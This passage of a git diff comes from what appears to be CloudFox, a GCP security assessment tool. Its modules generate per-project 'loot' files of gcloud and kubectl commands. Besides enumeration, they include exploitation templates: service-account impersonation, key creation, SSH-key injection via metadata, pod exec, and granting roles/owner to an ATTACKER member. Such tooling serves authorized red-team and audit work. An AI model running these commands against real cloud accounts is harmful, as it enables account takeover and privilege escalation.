+ Name: "identity-federation-commands", + Contents: "# Identity Federation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + + for _, pool := range pools { + m.addPoolToLoot(projectID, pool) + } + for _, provider := range providers { + m.addProviderToLoot(projectID, provider) + } + for _, fedBinding := range fedBindings { + m.addFederatedBindingToLoot(projectID, fedBinding) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d pool(s), %d provider(s), %d federated binding(s) in project %s", + len(pools), len(providers), len(fedBindings), projectID), globals.GCP_IDENTITY_FEDERATION_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *IdentityFederationModule) addPoolToLoot(projectID string, pool workloadidentityservice.WorkloadIdentityPool) { + lootFile := m.LootMap[projectID]["identity-federation-commands"] + if lootFile == nil { + return + } + status := "Active" + if pool.Disabled { + status = "Disabled" + } + lootFile.Contents += fmt.Sprintf( + "# ==========================================\n"+ + "# FEDERATION POOL: %s\n"+ + "# ==========================================\n"+ + "# Display Name: %s\n"+ + "# State: %s (%s)\n"+ + "# Description: %s\n"+ + "\n# Describe pool:\n"+ + "gcloud iam workload-identity-pools describe %s --location=global --project=%s\n\n"+ + "# List providers:\n"+ + "gcloud iam workload-identity-pools providers list --workload-identity-pool=%s --location=global --project=%s\n\n", + pool.PoolID, + pool.DisplayName, + pool.State, status, + pool.Description, + pool.PoolID, pool.ProjectID, + pool.PoolID, pool.ProjectID, + ) +} + +func (m *IdentityFederationModule) addProviderToLoot(projectID string, provider workloadidentityservice.WorkloadIdentityProvider) { + lootFile := m.LootMap[projectID]["identity-federation-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# ------------------------------------------\n"+ + "# PROVIDER: %s/%s (%s)\n"+ + "# ------------------------------------------\n", + provider.PoolID, provider.ProviderID, + provider.ProviderType, + ) + + if provider.ProviderType == "AWS" { + lootFile.Contents += fmt.Sprintf( + "# AWS Account: %s\n", provider.AWSAccountID) + } else if provider.ProviderType == "OIDC" { + lootFile.Contents += fmt.Sprintf( + "# OIDC Issuer: %s\n", provider.OIDCIssuerURI) + } + + if provider.AttributeCondition != "" { + lootFile.Contents += fmt.Sprintf( + "# Attribute Condition: %s\n", provider.AttributeCondition) + } else { + lootFile.Contents += "# Attribute Condition: NONE (any identity from this provider can authenticate!)\n" + } + + lootFile.Contents += fmt.Sprintf( + "\n# Describe provider:\n"+ + "gcloud iam workload-identity-pools providers describe %s --workload-identity-pool=%s --location=global --project=%s\n\n", + provider.ProviderID, provider.PoolID, provider.ProjectID, + ) + + // Add exploitation guidance based on provider type + switch provider.ProviderType { + case "AWS": + lootFile.Contents += fmt.Sprintf( + "# From AWS account %s, exchange credentials:\n"+ + "# gcloud iam workload-identity-pools create-cred-config \\\n"+ + "# projects/%s/locations/global/workloadIdentityPools/%s/providers/%s \\\n"+ + "# --aws --output-file=gcp-creds.json\n\n", + provider.AWSAccountID, + provider.ProjectID, provider.PoolID, provider.ProviderID, + ) + case "OIDC": + if strings.Contains(provider.OIDCIssuerURI, "github") { + lootFile.Contents += fmt.Sprintf( + "# From GitHub Actions workflow, add:\n"+ + "# permissions:\n"+ + "# id-token: write\n"+ + "# contents: read\n"+ + "# Then use:\n"+ + "# gcloud iam workload-identity-pools create-cred-config \\\n"+ + "# projects/%s/locations/global/workloadIdentityPools/%s/providers/%s \\\n"+ + "# --service-account=TARGET_SA@PROJECT.iam.gserviceaccount.com \\\n"+ + "# --output-file=gcp-creds.json\n\n", + provider.ProjectID, provider.PoolID, provider.ProviderID, + ) + } + } +} + +func (m *IdentityFederationModule) addFederatedBindingToLoot(projectID string, binding workloadidentityservice.FederatedIdentityBinding) { + lootFile := m.LootMap[projectID]["identity-federation-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# ------------------------------------------\n"+ + "# FEDERATED BINDING\n"+ + "# ------------------------------------------\n"+ + "# Pool: %s\n"+ + "# GCP Service Account: %s\n"+ + "# External Subject: %s\n\n", + binding.PoolID, + binding.GCPServiceAccount, + binding.ExternalSubject, + ) +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *IdentityFederationModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *IdentityFederationModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID := range m.ProjectPools { + tables := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = IdentityFederationOutput{Table: tables, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_IDENTITY_FEDERATION_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +func (m *IdentityFederationModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allPools := m.getAllPools() + allProviders := m.getAllProviders() + allFederatedBindings := m.getAllFederatedBindings() + + tables := m.buildTables(allPools, allProviders, allFederatedBindings) + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := IdentityFederationOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_IDENTITY_FEDERATION_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// buildTablesForProject builds tables for a specific project +func (m *IdentityFederationModule) buildTablesForProject(projectID string) []internal.TableFile { + pools := m.ProjectPools[projectID] + providers := m.ProjectProviders[projectID] + federatedBindings := m.ProjectFederatedBindings[projectID] + return m.buildTables(pools, providers, federatedBindings) +} + +// buildTables builds all tables from the given data +func (m *IdentityFederationModule) buildTables( + pools []workloadidentityservice.WorkloadIdentityPool, + providers []workloadidentityservice.WorkloadIdentityProvider, + federatedBindings []workloadidentityservice.FederatedIdentityBinding, +) []internal.TableFile { + var tables []internal.TableFile + + // Pools table + if len(pools) > 0 { + poolsHeader := []string{ + "Project", + "Pool ID", + "Display Name", + "State", + "Disabled", + } + + var poolsBody [][]string + for _, pool := range pools { + disabled := "No" + if pool.Disabled { + disabled = "Yes" + } + poolsBody = append(poolsBody, []string{ + m.GetProjectName(pool.ProjectID), + pool.PoolID, + pool.DisplayName, + pool.State, + disabled, + }) + } + + tables = append(tables, internal.TableFile{ + Name: "identity-federation-pools", + Header: poolsHeader, + Body: poolsBody, + }) + } + + // Providers table + if len(providers) > 0 { + providersHeader := []string{ + "Project", + "Pool", + "Provider", + "Type", + "OIDC Issuer / AWS Account", + "Trust Scope", + "Access Condition", + } + + var providersBody [][]string + for _, p := range providers { + issuerOrAccount := "-" + if p.ProviderType == "AWS" { + issuerOrAccount = p.AWSAccountID + } else if p.ProviderType == "OIDC" { + issuerOrAccount = p.OIDCIssuerURI + } + + attrCond := "NONE" + if p.AttributeCondition != "" { + attrCond = p.AttributeCondition + } + + trustScope := analyzeTrustScope(p) + + providersBody = append(providersBody, []string{ + m.GetProjectName(p.ProjectID), + p.PoolID, + p.ProviderID, + p.ProviderType, + issuerOrAccount, + trustScope, + attrCond, + }) + } + + tables = append(tables, internal.TableFile{ + Name: "identity-federation-providers", + Header: providersHeader, + Body: providersBody, + }) + } + + // Federated bindings table + if len(federatedBindings) > 0 { + fedBindingsHeader := []string{ + "Project", + "Pool", + "GCP Service Account", + "External Identity", + "SA Attack Paths", + } + + var fedBindingsBody [][]string + for _, fb := range federatedBindings { + attackPaths := gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, fb.GCPServiceAccount) + + fedBindingsBody = append(fedBindingsBody, []string{ + m.GetProjectName(fb.ProjectID), + fb.PoolID, + fb.GCPServiceAccount, + fb.ExternalSubject, + attackPaths, + }) + } + + tables = append(tables, internal.TableFile{ + Name: "identity-federation-bindings", + Header: fedBindingsHeader, + Body: fedBindingsBody, + }) + } + + return tables +} + +// analyzeTrustScope examines a provider's configuration and returns a human-readable +// summary of how broad the trust is. Flags overly permissive configurations. +func analyzeTrustScope(p workloadidentityservice.WorkloadIdentityProvider) string { + // No attribute condition = any identity from this provider + if p.AttributeCondition == "" { + switch p.ProviderType { + case "AWS": + return "BROAD: Any role in AWS account " + p.AWSAccountID + case "OIDC": + return "BROAD: Any identity from issuer" + case "SAML": + return "BROAD: Any SAML assertion" + default: + return "BROAD: No condition set" + } + } + + cond := p.AttributeCondition + var issues []string + + // Check for wildcard patterns in the condition + if strings.Contains(cond, `"*"`) || strings.Contains(cond, `'*'`) { + issues = append(issues, "wildcard (*) in condition") + } + + // GitHub Actions specific analysis + if p.ProviderType == "OIDC" && strings.Contains(p.OIDCIssuerURI, "github") { + // Check if repo is scoped + if !strings.Contains(cond, "repository") && !strings.Contains(cond, "repo") { + issues = append(issues, "no repo restriction") + } + + // Check if branch/ref is scoped + if strings.Contains(cond, "repository") || strings.Contains(cond, "repo") { + if !strings.Contains(cond, "ref") && !strings.Contains(cond, "branch") { + issues = append(issues, "no branch restriction") + } + } + + // Check for org-wide trust (repo starts with org/) + if strings.Contains(cond, ".startsWith(") { + issues = append(issues, "prefix match (org-wide?)") + } + } + + // GitLab CI specific analysis + if p.ProviderType == "OIDC" && strings.Contains(p.OIDCIssuerURI, "gitlab") { + if !strings.Contains(cond, "project_path") && !strings.Contains(cond, "namespace_path") { + issues = append(issues, "no project restriction") + } + if !strings.Contains(cond, "ref") && !strings.Contains(cond, "branch") { + issues = append(issues, "no branch restriction") + } + } + + // AWS specific analysis + if p.ProviderType == "AWS" { + if !strings.Contains(cond, "arn") && !strings.Contains(cond, "account") { + issues = append(issues, "no role/account restriction") + } + } + + if len(issues) > 0 { + return "BROAD: " + strings.Join(issues, ", ") + } + + return "Scoped" +} diff --git a/gcp/commands/keys.go b/gcp/commands/keys.go old mode 100644 new mode 100755 index be62a79b..9eb474f2 --- a/gcp/commands/keys.go +++ b/gcp/commands/keys.go @@ -55,7 +55,7 @@ type UnifiedKeyInfo struct { type KeysModule struct { gcpinternal.BaseGCPModule - ProjectKeys map[string][]UnifiedKeyInfo // projectID -> keys + ProjectKeys map[string][]UnifiedKeyInfo // projectID -> keys LootMap map[string]map[string]*internal.LootFile // projectID -> loot files mu sync.Mutex } @@ -269,6 +269,10 @@ func (m *KeysModule) processProject(ctx context.Context, projectID string, logge Name: "keys-apikey-test-commands", Contents: "# API Key Test Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } + m.LootMap[projectID]["keys-enumeration-commands"] = &internal.LootFile{ + Name: "keys-enumeration-commands", + Contents: "# Key Enumeration Commands\n# Generated by CloudFox\n\n", + } } for _, key := range projectKeys { @@ -279,6 +283,50 @@ func (m *KeysModule) processProject(ctx context.Context, projectID string, logge func (m *KeysModule) addKeyToLoot(projectID string, key UnifiedKeyInfo) { switch key.KeyType { + case "SA Key": + // Add enumeration commands for user-managed SA keys, especially old ones + if key.Origin == "User Managed" { + lootFile := m.LootMap[projectID]["keys-enumeration-commands"] + if lootFile != nil { + age := "-" + ageWarning := "" + if !key.CreateTime.IsZero() { + ageDuration := time.Since(key.CreateTime) + age = formatKeyAge(ageDuration) + days := int(ageDuration.Hours() / 24) + if days >= 365 { + ageWarning = " [OLD KEY - " + age + "]" + } else if days >= 90 { + ageWarning = " [" + age + " old]" + } + } + + lootFile.Contents += fmt.Sprintf( + "# SA Key: %s%s\n"+ + "# Service Account: %s\n"+ + "# Project: %s\n"+ + "# Created: %s (Age: %s)\n"+ + "# Origin: %s\n\n"+ + "# List all keys for this service account:\n"+ + "gcloud iam service-accounts keys list --iam-account=%s --project=%s\n\n"+ + "# Describe specific key:\n"+ + "gcloud iam service-accounts keys get-public-key %s --iam-account=%s --project=%s\n\n", + key.KeyID, + ageWarning, + key.Owner, + key.ProjectID, + key.CreateTime.Format("2006-01-02"), + age, + key.Origin, + key.Owner, + key.ProjectID, + key.KeyID, + key.Owner, + key.ProjectID, + ) + } + } + case "HMAC": if key.State == "ACTIVE" { lootFile := m.LootMap[projectID]["keys-hmac-s3-commands"] @@ -344,6 +392,7 @@ func (m *KeysModule) getTableHeader() []string { "State", "Created", "Expires", + "Age", "DWD", "Restrictions", } @@ -358,6 +407,12 @@ func (m *KeysModule) keysToTableBody(keys []UnifiedKeyInfo) [][]string { created = key.CreateTime.Format("2006-01-02") } + // Calculate age + age := "-" + if !key.CreateTime.IsZero() { + age = formatKeyAge(time.Since(key.CreateTime)) + } + expires := "-" if !key.ExpireTime.IsZero() { // Check for "never expires" (year 9999) @@ -398,6 +453,7 @@ func (m *KeysModule) keysToTableBody(keys []UnifiedKeyInfo) [][]string { key.State, created, expires, + age, dwd, restrictions, }) @@ -405,6 +461,28 @@ func (m *KeysModule) keysToTableBody(keys []UnifiedKeyInfo) [][]string { return body } +// formatKeyAge formats a duration into a human-readable age string +func formatKeyAge(d time.Duration) string { + days := int(d.Hours() / 24) + if days >= 365 { + years := days / 365 + remainingDays := days % 365 + months := remainingDays / 30 + if months > 0 { + return fmt.Sprintf("%dy %dm", years, months) + } + return fmt.Sprintf("%dy", years) + } else if days >= 30 { + months := days / 30 + remainingDays := days % 30 + if remainingDays > 0 { + return fmt.Sprintf("%dm %dd", months, remainingDays) + } + return fmt.Sprintf("%dm", months) + } + return fmt.Sprintf("%dd", days) +} + // writeHierarchicalOutput writes output to per-project directories func (m *KeysModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { outputData := internal.HierarchicalOutputData{ @@ -424,7 +502,7 @@ func (m *KeysModule) writeHierarchicalOutput(ctx context.Context, logger interna var lootFiles []internal.LootFile if projectLoot, ok := m.LootMap[projectID]; ok { for _, loot := range projectLoot { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + if loot != nil && loot.Contents != "" && !isEmptyLootFile(loot.Contents) { lootFiles = append(lootFiles, *loot) } } @@ -458,7 +536,7 @@ func (m *KeysModule) writeFlatOutput(ctx context.Context, logger internal.Logger var lootFiles []internal.LootFile for _, projectLoot := range m.LootMap { for _, loot := range projectLoot { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + if loot != nil && loot.Contents != "" && !isEmptyLootFile(loot.Contents) { lootFiles = append(lootFiles, *loot) } } diff --git a/gcp/commands/lateralmovement.go b/gcp/commands/lateralmovement.go old mode 100644 new mode 100755 index ab16ec28..e1249d58 --- a/gcp/commands/lateralmovement.go +++ b/gcp/commands/lateralmovement.go @@ -79,6 +79,9 @@ type LateralMovementModule struct { FoxMapperFindings []foxmapperservice.LateralFinding // FoxMapper-based findings FoxMapperCache *gcpinternal.FoxMapperCache + // OrgCache for ancestry lookups + OrgCache *gcpinternal.OrgCache + // Loot LootMap map[string]map[string]*internal.LootFile // projectID -> loot files mu sync.Mutex @@ -121,6 +124,15 @@ func runGCPLateralMovementCommand(cmd *cobra.Command, args []string) { func (m *LateralMovementModule) Execute(ctx context.Context, logger internal.Logger) { logger.InfoM("Mapping lateral movement paths...", GCP_LATERALMOVEMENT_MODULE_NAME) + // Load OrgCache for ancestry lookups (needed for per-project filtering) + m.OrgCache = gcpinternal.GetOrgCacheFromContext(ctx) + if m.OrgCache == nil || !m.OrgCache.IsPopulated() { + diskCache, _, err := gcpinternal.LoadOrgCacheFromFile(m.OutputDirectory, m.Account) + if err == nil && diskCache != nil && diskCache.IsPopulated() { + m.OrgCache = diskCache + } + } + // Get FoxMapper cache from context or try to load it m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) if m.FoxMapperCache == nil || !m.FoxMapperCache.IsPopulated() { @@ -144,7 +156,11 @@ func (m *LateralMovementModule) Execute(ctx context.Context, logger internal.Log if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { logger.InfoM("Analyzing permission-based lateral movement using FoxMapper...", GCP_LATERALMOVEMENT_MODULE_NAME) svc := m.FoxMapperCache.GetService() - m.FoxMapperFindings = svc.AnalyzeLateral("") + allFindings := svc.AnalyzeLateral("") + + // Filter findings to only include principals from specified projects + m.FoxMapperFindings = m.filterFindingsByProjects(allFindings) + if len(m.FoxMapperFindings) > 0 { logger.InfoM(fmt.Sprintf("Found %d permission-based lateral movement techniques", len(m.FoxMapperFindings)), GCP_LATERALMOVEMENT_MODULE_NAME) } @@ -174,6 +190,37 @@ func (m *LateralMovementModule) Execute(ctx context.Context, logger internal.Log m.writeOutput(ctx, logger) } +// filterFindingsByProjects filters FoxMapper findings to only include principals +// from the specified projects (via -p or -l flags) OR principals without a clear project +func (m *LateralMovementModule) filterFindingsByProjects(findings []foxmapperservice.LateralFinding) []foxmapperservice.LateralFinding { + // Build a set of specified project IDs for fast lookup + specifiedProjects := make(map[string]bool) + for _, projectID := range m.ProjectIDs { + specifiedProjects[projectID] = true + } + + var filtered []foxmapperservice.LateralFinding + + for _, finding := range findings { + var filteredPrincipals []foxmapperservice.PrincipalAccess + for _, p := range finding.Principals { + principalProject := extractProjectFromPrincipal(p.Principal, m.OrgCache) + // Include if: SA from specified project OR user/group (no project) + if specifiedProjects[principalProject] || principalProject == "" { + filteredPrincipals = append(filteredPrincipals, p) + } + } + + if len(filteredPrincipals) > 0 { + filteredFinding := finding + filteredFinding.Principals = filteredPrincipals + filtered = append(filtered, filteredFinding) + } + } + + return filtered +} + // ------------------------------ // Project Processor // ------------------------------ @@ -187,56 +234,140 @@ func (m *LateralMovementModule) initializeLootForProject(projectID string) { } } -func (m *LateralMovementModule) generatePlaybook() *internal.LootFile { +// getLateralExploitCommand returns specific exploitation commands for a lateral movement permission +func getLateralExploitCommand(permission, principal, project string) string { + commands := map[string]string{ + // Service Account Impersonation + "iam.serviceAccounts.getAccessToken": "gcloud auth print-access-token --impersonate-service-account=TARGET_SA", + "iam.serviceAccountKeys.create": "gcloud iam service-accounts keys create key.json --iam-account=TARGET_SA", + "iam.serviceAccounts.signBlob": "gcloud iam service-accounts sign-blob --iam-account=TARGET_SA input.txt output.sig", + "iam.serviceAccounts.signJwt": "# Sign JWT to impersonate SA\ngcloud iam service-accounts sign-jwt --iam-account=TARGET_SA claim.json signed.jwt", + "iam.serviceAccounts.getOpenIdToken": "gcloud auth print-identity-token --impersonate-service-account=TARGET_SA", + "iam.serviceAccounts.actAs": "# actAs allows deploying resources with this SA\ngcloud run deploy SERVICE --service-account=TARGET_SA", + + // Compute Access + "compute.instances.osLogin": "gcloud compute ssh INSTANCE --zone=ZONE --project=PROJECT", + "compute.instances.setMetadata": "gcloud compute instances add-metadata INSTANCE --zone=ZONE --metadata=ssh-keys=\"user:$(cat ~/.ssh/id_rsa.pub)\"", + "compute.projects.setCommonInstanceMetadata": "gcloud compute project-info add-metadata --metadata=ssh-keys=\"user:$(cat ~/.ssh/id_rsa.pub)\"", + "compute.instances.getSerialPortOutput": "gcloud compute instances get-serial-port-output INSTANCE --zone=ZONE", + + // GKE Access + "container.clusters.getCredentials": "gcloud container clusters get-credentials CLUSTER --zone=ZONE --project=PROJECT", + "container.pods.exec": "kubectl exec -it POD -- /bin/sh", + "container.pods.attach": "kubectl attach -it POD", + + // Serverless + "cloudfunctions.functions.create": "gcloud functions deploy FUNC --runtime=python311 --service-account=TARGET_SA --trigger-http", + "cloudfunctions.functions.update": "gcloud functions deploy FUNC --service-account=TARGET_SA", + "run.services.create": "gcloud run deploy SERVICE --image=IMAGE --service-account=TARGET_SA", + "run.services.update": "gcloud run services update SERVICE --service-account=TARGET_SA", + + // IAM Policy Modification + "resourcemanager.projects.setIamPolicy": "gcloud projects add-iam-policy-binding PROJECT --member=user:ATTACKER --role=roles/owner", + "resourcemanager.folders.setIamPolicy": "gcloud resource-manager folders add-iam-policy-binding FOLDER_ID --member=user:ATTACKER --role=roles/owner", + "resourcemanager.organizations.setIamPolicy": "gcloud organizations add-iam-policy-binding ORG_ID --member=user:ATTACKER --role=roles/owner", + } + + cmd, ok := commands[permission] + if !ok { + return fmt.Sprintf("# No specific command for %s - check gcloud documentation", permission) + } + + if project != "" && project != "-" { + cmd = strings.ReplaceAll(cmd, "PROJECT", project) + } + + return cmd +} + +// generatePlaybookForProject generates a loot file specific to a project +func (m *LateralMovementModule) generatePlaybookForProject(projectID string) *internal.LootFile { var sb strings.Builder - sb.WriteString("# GCP Lateral Movement Playbook\n") + sb.WriteString("# GCP Lateral Movement Commands\n") + sb.WriteString(fmt.Sprintf("# Project: %s\n", projectID)) sb.WriteString("# Generated by CloudFox\n\n") - // Token theft vectors - if len(m.AllPaths) > 0 { + // Token theft vectors for this project + if paths, ok := m.ProjectPaths[projectID]; ok && len(paths) > 0 { sb.WriteString("## Token Theft Vectors\n\n") - // Group by category - byCategory := make(map[string][]LateralMovementPath) - for _, path := range m.AllPaths { - byCategory[path.Category] = append(byCategory[path.Category], path) - } - - for category, paths := range byCategory { - sb.WriteString(fmt.Sprintf("### %s\n\n", category)) - for _, path := range paths { - sb.WriteString(fmt.Sprintf("**%s → %s**\n", path.Source, path.Target)) - sb.WriteString(fmt.Sprintf("- Method: %s\n", path.Method)) - sb.WriteString(fmt.Sprintf("- Risk: %s\n", path.RiskLevel)) - sb.WriteString(fmt.Sprintf("- Description: %s\n\n", path.Description)) - if path.ExploitCommand != "" { - sb.WriteString("```bash\n") - sb.WriteString(path.ExploitCommand) - sb.WriteString("\n```\n\n") - } + for _, path := range paths { + sb.WriteString(fmt.Sprintf("### %s -> %s\n", path.Source, path.Target)) + sb.WriteString(fmt.Sprintf("# Method: %s\n", path.Method)) + sb.WriteString(fmt.Sprintf("# Category: %s\n", path.Category)) + if path.ExploitCommand != "" { + sb.WriteString(path.ExploitCommand) + sb.WriteString("\n\n") } } } - // Permission-based findings from FoxMapper + // Permission-based findings - filter to this project's principals + users/groups if len(m.FoxMapperFindings) > 0 { - sb.WriteString("## Permission-Based Lateral Movement Techniques\n\n") + hasFindings := false + for _, finding := range m.FoxMapperFindings { - sb.WriteString(fmt.Sprintf("### %s (%s)\n", finding.Technique, finding.Category)) - sb.WriteString(fmt.Sprintf("- Permission: %s\n", finding.Permission)) - sb.WriteString(fmt.Sprintf("- Description: %s\n", finding.Description)) - sb.WriteString(fmt.Sprintf("- Principals with access: %d\n\n", len(finding.Principals))) - if finding.Exploitation != "" { - sb.WriteString("```bash\n") - sb.WriteString(finding.Exploitation) - sb.WriteString("\n```\n\n") + var relevantPrincipals []foxmapperservice.PrincipalAccess + + for _, p := range finding.Principals { + principalProject := extractProjectFromPrincipal(p.Principal, m.OrgCache) + if principalProject == projectID || principalProject == "" { + relevantPrincipals = append(relevantPrincipals, p) + } + } + + if len(relevantPrincipals) == 0 { + continue + } + + if !hasFindings { + sb.WriteString("## Permission-Based Lateral Movement Commands\n\n") + hasFindings = true + } + + sb.WriteString(fmt.Sprintf("### %s (%s)\n", finding.Permission, finding.Category)) + sb.WriteString(fmt.Sprintf("# %s\n\n", finding.Description)) + + for _, p := range relevantPrincipals { + project := extractProjectFromPrincipal(p.Principal, m.OrgCache) + if project == "" { + project = projectID + } + + principalType := p.MemberType + if principalType == "" { + if p.IsServiceAccount { + principalType = "serviceAccount" + } else { + principalType = "user" + } + } + + sb.WriteString(fmt.Sprintf("## %s (%s)\n", p.Principal, principalType)) + + if p.IsServiceAccount { + sb.WriteString(fmt.Sprintf("# Impersonate first:\ngcloud config set auth/impersonate_service_account %s\n\n", p.Principal)) + } + + cmd := getLateralExploitCommand(finding.Permission, p.Principal, project) + sb.WriteString(cmd) + sb.WriteString("\n\n") + + if p.IsServiceAccount { + sb.WriteString("# Reset impersonation when done:\n# gcloud config unset auth/impersonate_service_account\n\n") + } } } } + contents := sb.String() + if contents == fmt.Sprintf("# GCP Lateral Movement Commands\n# Project: %s\n# Generated by CloudFox\n\n", projectID) { + return nil + } + return &internal.LootFile{ - Name: "lateral-movement-playbook", - Contents: sb.String(), + Name: "lateral-movement-commands", + Contents: contents, } } @@ -620,11 +751,13 @@ func (m *LateralMovementModule) getHeader() []string { func (m *LateralMovementModule) getFoxMapperHeader() []string { return []string{ - "Technique", + "Scope Type", + "Scope ID", + "Principal Type", + "Principal", "Category", "Permission", "Description", - "Principal Count", } } @@ -644,76 +777,173 @@ func (m *LateralMovementModule) pathsToTableBody(paths []LateralMovementPath) [] return body } +// foxMapperFindingsForProject returns findings for a specific project +// Includes: SAs from that project + users/groups (which can access any project) +// Also filters by scope: only org/folder/project findings in the project's hierarchy +func (m *LateralMovementModule) foxMapperFindingsForProject(projectID string) [][]string { + var body [][]string + + // Get ancestor folders and org for filtering + var ancestorFolders []string + var projectOrgID string + if m.OrgCache != nil && m.OrgCache.IsPopulated() { + ancestorFolders = m.OrgCache.GetProjectAncestorFolders(projectID) + projectOrgID = m.OrgCache.GetProjectOrgID(projectID) + } + ancestorFolderSet := make(map[string]bool) + for _, f := range ancestorFolders { + ancestorFolderSet[f] = true + } + + for _, f := range m.FoxMapperFindings { + for _, p := range f.Principals { + principalProject := extractProjectFromPrincipal(p.Principal, m.OrgCache) + + // Include if: SA from this project OR user/group (no project) + if principalProject != projectID && principalProject != "" { + continue + } + + // Filter by scope hierarchy + if !m.scopeMatchesProject(p.ScopeType, p.ScopeID, projectID, projectOrgID, ancestorFolderSet) { + continue + } + + principalType := p.MemberType + if principalType == "" { + if p.IsServiceAccount { + principalType = "serviceAccount" + } else { + principalType = "user" + } + } + + scopeType := p.ScopeType + if scopeType == "" { + scopeType = "-" + } + scopeID := p.ScopeID + if scopeID == "" { + scopeID = "-" + } + + body = append(body, []string{ + scopeType, + scopeID, + principalType, + p.Principal, + f.Category, + f.Permission, + f.Description, + }) + } + } + return body +} + +// foxMapperFindingsToTableBody returns all findings (for flat output) func (m *LateralMovementModule) foxMapperFindingsToTableBody() [][]string { var body [][]string for _, f := range m.FoxMapperFindings { - body = append(body, []string{ - f.Technique, - f.Category, - f.Permission, - f.Description, - fmt.Sprintf("%d", len(f.Principals)), - }) + for _, p := range f.Principals { + principalType := p.MemberType + if principalType == "" { + if p.IsServiceAccount { + principalType = "serviceAccount" + } else { + principalType = "user" + } + } + + scopeType := p.ScopeType + if scopeType == "" { + scopeType = "-" + } + scopeID := p.ScopeID + if scopeID == "" { + scopeID = "-" + } + + body = append(body, []string{ + scopeType, + scopeID, + principalType, + p.Principal, + f.Category, + f.Permission, + f.Description, + }) + } } return body } func (m *LateralMovementModule) buildTablesForProject(projectID string) []internal.TableFile { - var tableFiles []internal.TableFile + // No longer outputting the old lateral-movement table + // All findings are now in lateral-movement-permissions + return []internal.TableFile{} +} - if paths, ok := m.ProjectPaths[projectID]; ok && len(paths) > 0 { - tableFiles = append(tableFiles, internal.TableFile{ - Name: "lateral-movement", - Header: m.getHeader(), - Body: m.pathsToTableBody(paths), - }) +// scopeMatchesProject checks if a scope (org/folder/project) is in the hierarchy for a project +func (m *LateralMovementModule) scopeMatchesProject(scopeType, scopeID, projectID, projectOrgID string, ancestorFolderSet map[string]bool) bool { + if scopeType == "" || scopeID == "" { + // No scope info - include by default + return true } - return tableFiles + switch scopeType { + case "project": + return scopeID == projectID + case "organization": + if projectOrgID != "" { + return scopeID == projectOrgID + } + // No org info - include by default + return true + case "folder": + if len(ancestorFolderSet) > 0 { + return ancestorFolderSet[scopeID] + } + // No folder info - include by default + return true + case "resource": + // Resource-level - include by default + return true + default: + return true + } } func (m *LateralMovementModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { outputData := internal.HierarchicalOutputData{ OrgLevelData: make(map[string]internal.CloudfoxOutput), + FolderLevelData: make(map[string]internal.CloudfoxOutput), ProjectLevelData: make(map[string]internal.CloudfoxOutput), } - // Generate playbook once for all projects - playbook := m.generatePlaybook() - playbookAdded := false - - // Iterate over ALL projects, not just ones with enumerated paths + // Process each specified project for _, projectID := range m.ProjectIDs { - tableFiles := m.buildTablesForProject(projectID) + var tableFiles []internal.TableFile - var lootFiles []internal.LootFile - if projectLoot, ok := m.LootMap[projectID]; ok { - for _, loot := range projectLoot { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { - lootFiles = append(lootFiles, *loot) - } - } - } - - // Add playbook to first project only - if playbook != nil && playbook.Contents != "" && !playbookAdded { - lootFiles = append(lootFiles, *playbook) - playbookAdded = true - } - - // Add FoxMapper findings table to first project only - if len(m.FoxMapperFindings) > 0 && projectID == m.ProjectIDs[0] { + // Add FoxMapper findings table for this project (the only table now) + foxMapperBody := m.foxMapperFindingsForProject(projectID) + if len(foxMapperBody) > 0 { tableFiles = append(tableFiles, internal.TableFile{ Name: "lateral-movement-permissions", 